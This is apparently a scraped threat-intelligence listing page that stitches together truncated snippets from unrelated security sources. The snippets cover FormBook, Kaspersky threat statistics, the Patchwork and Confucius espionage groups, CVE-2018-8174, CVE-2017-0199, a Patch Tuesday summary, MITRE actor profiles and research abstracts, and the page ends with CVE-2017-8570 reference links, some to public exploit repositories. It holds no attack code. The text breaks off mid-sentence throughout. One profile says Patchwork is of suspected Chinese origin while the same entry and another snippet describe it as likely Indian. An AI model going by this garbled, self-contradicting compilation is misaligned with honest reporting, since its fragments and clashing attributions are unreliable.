In this article, I will focus on the payload and elaborate on the behavior and IOCs of the malware.
## FormBook Anti-Analysis Techniques
Let’s start with FormBook’s attempts to prevent malware researchers from debugging and analysing the malware. From research done by others, we know
Zscaler
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
blogs_zscaler·2018-12-31
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Attacks on IoT devices
- Online threats in the financial sector
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q2 figures
According to KSN:
- Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
- 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
- Ransomware attacks were registered on the computers of 158,921 unique users.
- Our File Anti-Virus logged 192,053,
Volexity
Patchwork APT Group Targets US Think Tanks
blogs_volexity·2018-06-07·CVSS 7.8
[HIGH] Patchwork APT Group Targets US Think Tanks
Threat Intelligence
## Patchwork APT Group Targets US Think Tanks
June 7, 2018
Matthew Meltzer, Sean Koessel, and Steven Adair
In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are le
Trendmicro
Confucius Update: New Techniques, More Patchwork Links
blogs_trendmicro·2018-05-23
Confucius Update: New Techniques, More Patchwork Links
APT & Targeted Attacks
# Confucius Update: New Techniques, More Patchwork Links
We look into the latest tools and techniques used by Confucius, as the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.
By: Daniel Lunghi, Jaromir Horejsi
2018/05/23
Updated the appendix on August 30, 2018 to fix formatting and add new information.
Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia. During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q3 figures
According to KSN data:
- Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.
- 72,012,219 unique URLs were recognized as malicious by web antivirus components.
- Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.
- Crypto ransomware attacks were blocked on the computers of 186,283 unique users.
- Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
# CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malware type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu
2017/08/14
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017019
Talos
Microsoft Patch Tuesday - July 2017
blogs_talos·2017-07-11·CVSS 7.8
CVE-2017-8463 [HIGH] Microsoft Patch Tuesday - July 2017
Today, Microsoft released its monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities, with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.
### Vulnerabilities Rated Critical
#### CVE-2017-8463
This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited, this vulnerability could allow arbitrary code to run; users not running as administrators would be less affected. This vulnerability can be triggered via a malicious shared folder and malware named with an executable extension.
#### CVE-2017-8584
A remote code execution vul
Threat Intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
threat_intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
# Threat Actor Profile: Cobalt Group
ATT&CK ID: G0080
Also known as: Cobalt Group, GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
## Overview
Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
blogs_recorded_future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
## Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report , and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
## Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to she
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
An Analysis of Malware Trends in Enterprise Networks
arxiv_fulltext·2019-10-01
An Analysis of Malware Trends in Enterprise Networks
Abbas Acar (Florida International University), Long Lu (Northeastern University), A. Selcuk Uluagac (Florida International University), Engin Kirda (Northeastern University)
## Abstract
We present an empirical and large-scale analysis of malware samples captured from two different enterprises from 2017 to early 2018. Particularly, we perform threat vector, social-engineering, vulnerability and time-series analysis on our dataset. Unlike existing malware studies, our analysis is specifically focused on the recent enterprise malware samples. First of all, based on our analysis on the combined datasets of two enterprises, our results confirm the general consensu
- http://www.securityfocus.com/bid/99445
- https://github.com/ParsingTeam/ppsx-file-generator
- https://github.com/rxwx/CVE-2017-8570
- https://github.com/tezukanice/Office8570
- https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8570
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-8570
2017-07-11
Published
2022-02-25
Added to CISA KEV
Exploited in the wild